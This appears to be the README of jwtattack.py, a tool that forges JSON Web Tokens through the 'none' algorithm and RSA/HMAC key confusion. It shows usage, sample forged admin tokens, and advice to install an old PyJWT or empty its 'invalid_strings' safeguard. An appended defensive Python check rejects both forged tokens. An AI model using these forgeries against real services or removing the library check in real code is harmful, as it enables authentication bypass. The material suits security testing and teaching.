# jwtattack.py

## Requirements

* Python3
* PyJWT 0.4.3: `pip install pyjwt==0.4.3` (later versions don't allow public keys for symmetric signatures)

Alternative: replace

```
invalid_strings = [
    b'-----BEGIN PUBLIC KEY-----',
    b'-----BEGIN CERTIFICATE-----',
    b'-----BEGIN RSA PUBLIC KEY-----',
    b'ssh-rsa'
]
```

in algorithms.py with

```
invalid_strings = []
```

## Usage

```
$ ./jwtattack.py -h
usage: jwtattack.py [-h] [-V] [-v] [-a] [-n] [-r] [-H HEADERS [HEADERS ...]]
                    [-D DATA [DATA ...]]
                    token [PUBLIC_KEY]

This script tries to create malicious JSON Web Tokens

positional arguments:
  token                 the JWT to attack

optional arguments:
  -h, --help            show this help message and exit
  -V, --version         show program's version number and exit
  -v, --verbose         display verbose output

Attack options:
  Select attack options to generate malicious tokens

  -a, --all             generate all possible malicious tokens
  -n, --none            generate a token using the 'none' algorithm
  -r, --rsa             generate a token signed with the public key
  PUBLIC_KEY            public key for the RSA attack (alternatively stdin)
  -H HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
                        Changes to apply to the header, format key:value
  -D DATA [DATA ...], --data DATA [DATA ...]
                        Changes to apply to the data, format key:value
```

## Sample output

```
$ echo "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3WojgGHFHYLugd
UWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlvdbH6dvEOfou0/gCFQs
HUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GUnKHkkle+Q0pX/g6jXZ7r1/xAK5D
o2kQ+X5xK9cipRgEKwIDAQAB
-----END PUBLIC KEY-----" | ./jwtattack.py -a eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.TCYt5XsITJX1CxPCT8yAV-TVkIEq_PbChOMqsLfRoPsnsgw5WEuts01mq-pQy7UJiN5mgRxD-WUcX16dUEMGlv50aqzpqh4Qktb3rk-BuQy72IFLOqV0G_zS245-kronKb78cPN25DGlcTwLtjPAYuNzVBAh4vGHSrQyHUdBBPM
None: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.
RSA: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.mm69FICCR3LpghwmUJDjrwcrXlqkvgbKGiLhUp-jI5U
```
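As an added defensive counterpart (not part of jwtattack.py), the stdlib-only Python gate below shows the server-side checks that make both generated tokens fail: the algorithm is pinned by server configuration instead of being read from the header, `alg: none` is refused, and PEM-looking key material is refused as an HMAC secret, mirroring the `invalid_strings` check in PyJWT 0.4.3 mentioned above. The three tokens are copied from the sample output; the public key is shortened to its first line since only the PEM marker matters here, and `gate` is an illustrative name.

```python
import base64
import json

# The three tokens from the sample output above: the original RS256 token, the
# unsigned "none" token and the HS256 token signed with the public key.
ORIGINAL_RS256 = ("eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0."
                  "TCYt5XsITJX1CxPCT8yAV-TVkIEq_PbChOMqsLfRoPsnsgw5WEuts01mq-pQy7UJiN5mgRxD-WUcX16dUEMGlv50aqzpqh4Qktb3rk-BuQy72IFLOqV0G_zS245-kronKb78cPN25DGlcTwLtjPAYuNzVBAh4vGHSrQyHUdBBPM")
NONE_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0."
CONFUSED_HS256 = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.mm69FICCR3LpghwmUJDjrwcrXlqkvgbKGiLhUp-jI5U"
# Server-side key material (shortened: only the PEM marker matters for this check).
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3WojgGHFHYLugd\n-----END PUBLIC KEY-----"

# The same marker strings PyJWT 0.4.3 uses to refuse public keys as HMAC secrets.
PEM_MARKERS = [b'-----BEGIN PUBLIC KEY-----', b'-----BEGIN CERTIFICATE-----',
               b'-----BEGIN RSA PUBLIC KEY-----', b'ssh-rsa']


def b64url_decode(segment: str) -> bytes:
    # JWT segments are unpadded base64url; restore the padding before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def gate(token: str, expected_alg: str, key: bytes):
    """Checks a verifier must run before any signature code executes.

    expected_alg and key come from server configuration, never from the token.
    Returns (accepted, reason); accepted=True only means the signature may now be
    verified with expected_alg and key, not that the token is valid."""
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed: expected header.payload.signature"
    try:
        header = json.loads(b64url_decode(parts[0]))
    except (ValueError, UnicodeDecodeError):
        return False, "malformed: header is not base64url-encoded JSON"
    alg = header.get("alg") if isinstance(header, dict) else None
    if not isinstance(alg, str) or alg.lower() == "none":
        return False, "rejected: unsigned token (alg none)"
    if alg != expected_alg:
        return False, f"rejected: header alg {alg!r} differs from pinned {expected_alg!r}"
    if expected_alg.startswith("HS") and any(m in key for m in PEM_MARKERS):
        return False, "rejected: public key material offered as an HMAC secret"
    if not parts[2]:
        return False, "rejected: empty signature"
    return True, "proceed to signature verification with the pinned algorithm"


if __name__ == "__main__":
    for name, tok in [("original", ORIGINAL_RS256), ("None", NONE_TOKEN), ("RSA", CONFUSED_HS256)]:
        print(name, gate(tok, "RS256", PUBLIC_KEY_PEM))
```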